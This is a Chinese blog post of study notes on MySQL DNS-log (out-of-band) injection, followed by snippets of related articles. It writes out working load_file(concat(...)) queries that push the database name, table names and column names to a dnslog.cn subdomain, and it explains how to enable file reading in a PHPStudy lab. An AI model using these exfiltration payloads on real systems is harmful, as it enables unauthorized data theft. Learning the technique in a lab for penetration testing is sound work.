(mysql的)DNS注入

最新推荐文章于 2024-05-29 14:50:04 发布
原创 最新推荐文章于 2024-05-29 14:50:04 发布 · 292 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试

本文总结了DNS注入的基础知识,包括如何利用LOAD_FILE()函数读取文件,以及在PHPStudy环境中配置该函数的方法。通过DNSLog.cn平台进行DNS注入实践,展示了如何获取数据库名、表名、列名等信息。此外,还讨论了DNS注入的限制,如目标必须有网络,以及Linux环境中SMB服务的缺失可能影响注入效果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、基础知识总结:

DNS注入→让盲注变成显错注入

LOAD_FILE() :读取文件的函数
在phpstudy的cmd里用的时候,需要在从其他选项菜单→打开配置文件→mysql-ini的配置文件里加上:
secure_file_priv=
配置好后重启,才好使。
举例:select load_file('C\\1.txt')
两个\\原因,其中一个是转义符。
可以写绝对路径,也可以相对路径。

UNC路径:
Windows的SMB服务——可以共享文件

load_file 支持UNC路径。

http://dnslog.cn/   是dns注入的平台,用法:
点get subdomain,复制网址去访问,再点refresh record刷新,能显示访问人的ip

如果访问子域名,比如abc.8rrsju.dnslog.cn,再点refresh record刷新,也能显示访问人的ip

phpstudy中,select load_file('//8rrsju.dnslog.cn'),再点refresh record刷新,也能显示访问人的ip

用 concat()字符串拼接,把数据库和网址拼接起来,如:
select load_file(concat('//',database(),'.8rrsju.dnslog.cn/abc'));
ps:注意这一步的前提是cmd里进入数据库。
再点refresh record刷新,在网站的DNS Query Record里出现了test.8rrsju.dnslog.cn,其中test就是数据库名。

可以同理得到表名,列名,数据。
查表名:
select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.8rrsju.dnslog.cn/abc'));
ps:注意这一步的前提是cmd里进入的数据库不为空(里面至少有一个表)。
得到表名之一为admin123

查列名:
select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='admin123' limit 0,1),'.8rrsju.dnslog.cn/abc'));
得到列名之一为Id

这种方法又叫 OBB:数据外带
这种方法的弱点:
1.目标得有网络。
2.SMB服务 Windows自带,Linux不自带。(面试时候可能会问DNS注入可以用于Linux吗?答案是不一定可以,并需要解释原因为SMB服务 Windows自带,Linux不自带)

 二、靶场:

MySQL-DNS注入
weixin_45634365的博客
03-03 324
一、DNS注入的原理 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,将盲注变为显错注入 即读取远程共享文件,拼接出函数,进行查询,再拼接到域名中,访问时将访问服务器,记录后查看日志 对于sql盲注,常见的方法是使用二分法一个个猜,但是这样的方法很麻烦,还很容易因为数据请求频繁导致被禁 所以可以将查询到的数据发送给一个URL,利用DNS解析产生的记录日志
封神台MYSQL 注入 - Dns注入
qq_40941912的博客
10-05 1214
一、原理 DNSLOG的使用场景: 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 LOAD_FILE()读取文件的函数 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。
数据库注入学习笔记2---MySQL注入DNS注入
qq_41759633的博客
08-07 322
引:DNS注入并不是对DNS服务器进行注入,而是利用DNS解析的时候会留下的有用的日志,简称:DNS log注入。 条件:有SQL盲注(或时间)注入的站点,可是用sqlmap跑需要频繁请求,最后导致ip被ban。 发现疑似命令注入的洞,但是目标站点不显示,无法确认是不是有漏洞 目标不让信息显示出来,如能发送请求,那么就可以尝试咱这个办法----用DNS log来获取回显(一般为root权限) 首先...
数据库外带——DNS注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-14 1296
Mysql注入——DNS注入 靶场地址 原理:利用UNC路径去访问服务器,dns会有日志,通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志 1.,我们看到靶场,首先尝试最简单的get传参,注入 它是直接将id传参拼接进去,然后用mysqli_connect()函数进行针对数据库的查询,我们顺理成章再后面输入内容?id=1进行测试 页面正常,继续
MySQL DNS的使用过程详细分析
09-11
mysql 客户端连接 mysql 服务器 (进程为:mysqld)mysqld 会创建一个新的线程来处理该请求。该线程先检查是否主机名在主机名缓存中
MySQL注入Dns 注入
最新发布
baimaozi008的博客
05-29 1224
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
mysql——DNS注入
qq_45300786的博客
08-09 1868
DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 DNS注入的核心,将盲注转化为显错注入 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 比如 ox.qidao.com => DNS记录了这个请求, 那么我们也可以让mysql也能发出请求,DNS也会记录 ...
mysql注入dns注入
seek_2022的博客
05-03 2512
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
MySQL_DNS注入
Mr.Huang_的博客
09-06 220
一、DNSLOG的使用场景 DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 日志 => 日记 - 记录操作、记录访问的文件 DNS日志 => 某时某分谁谁谁请求我查某某域名 如果我们搭建一个DNS服务器来承接域名解析。所有的访问域名都会被我们的日志记录下来 域名 => 由运营商解析。 修改域名的设置方法,强行执行某个Ip去解析域名 NS记录 固定的域名 由固定的DNS服务器解析 DNS注入的核心,将盲注转化为显错注入 DNS协议
远程连接MySQL速度慢的解决方法以及MySQL解析DNS的流程图[附PDF下载]
03-17
mysql使用dns 流程解析 pdf下载 博文链接:https://whitepoplar.iteye.com/blog/561343
MySQL盲注
qq_39654116的博客
01-05 541
这里写目录标题布尔盲注时间盲注sleep函数benchmark函数笛卡尔积函数get_lock盲注正则DOS RLIKE注入dnslog盲注后续待补充 布尔盲注 盲注一般先看长度 id=4 and length(user())=14 布尔盲注的方法 substr,substring,mid,left,right截取单个字符 id=4 and substr((select user()),1,1)=0x72 id=4 and left((select user()),1)=0x72 用ascii(),or
MYSQL--Dns注入
qq_68233961的博客
08-07 1192
MYSQL--Dns注入
mysql注入---DNSLOG注入
nini_boom的博客
07-21 620
不一定学习进度速度快,就代表掌控的东西就多。学习的目标在于对于理解的知识深度和广度,速度快会有很多时间学习广度的东西,但在有限广度的情况下,理解的深度才是更重要的,所以在这种情况下,不要在意学习的进度,把握住学习的节奏,向更深处理解。扎下深根的竹子,在疯狂生长的时候才有更多的后备力量。 0x01 DNSLOG注入 当我们遇到了盲注、延时注入时,页面没有具体的返回。 但是盲注、延时注入需要进行大...
mysql dns反解析的问题
weixin_33907511的博客
08-02 169
最近发现新专栏的数据库连接非常慢,登陆mysql数据库 mysql>show processlist; | 20681949 | unauthenticated user | 10.10.4.193:52497 | NULL | Connect | | Reading from net | NULL | | 20681948 | unauthenticated user | 10.10...
mysql dns 注入_DNSlog应用
weixin_36296215的博客
01-27 262
————背景说明————在做渗透的时候,有一些漏洞发现无回显的,比如sql注入,一般当我们拿到一个无回显的注入,那么我们往往会采用盲注,使用二分法不断猜测字符等方式来取信息,不过这样的方式耗时又费力,而且频繁地测试容易被目标网站ban掉。那么面对盲注,或者是其他漏洞的盲打,有没有哪种方法,可以快速地获取我们需要的信息呢,答案是有的,即本篇主要说的,利用DNS快速获取数据,官方地讲即DNSlog。这...
mysql dnslog_mysql-dnslog注入
weixin_39836751的博客
01-19 300
@Adminxednslog原理简介:简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入mysql下的...
域名服务和DNS服务 MYSQL数据库
m0_69969642的博客
07-16 330
sudo 即superuser do,允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt, reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性 在最早之前,一般用户管理系统的方式是利用su切换为超级用户。但是使用su的缺点之一在于必须要先 告知超级用户的密码。sudo于1980年前后推出,sudo使一般用户不需要知道超级用户的密码即可获得 权限。
mysql优化dns_MySQL-配置优化技巧
weixin_26875543的博客
02-02 404
一、连接请求配置1.查询当前连接数(show full processlist)show full processlist;2.最大连接数(max_connections)max_connections, 增加该值增加 mysqld 要求的文件描述符的数量, 如果服务器的并发连接请求量比较大, 建议调高此值, 以增加并行连接数量, 当然这建立在机器能支撑的情况下, 因为如果连接数越多, 介于MyS...
SQL注入攻击详解与防御策略
- DNS注入:利用DNS查询延迟来获取信息。 四、MySQL中的函数与查询 了解MySQL中的函数和表对于进行SQL注入至关重要。例如,`SELECT`函数用于查询数据,`UNION`用于合并多个查询结果,而默认表如`information_schema...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值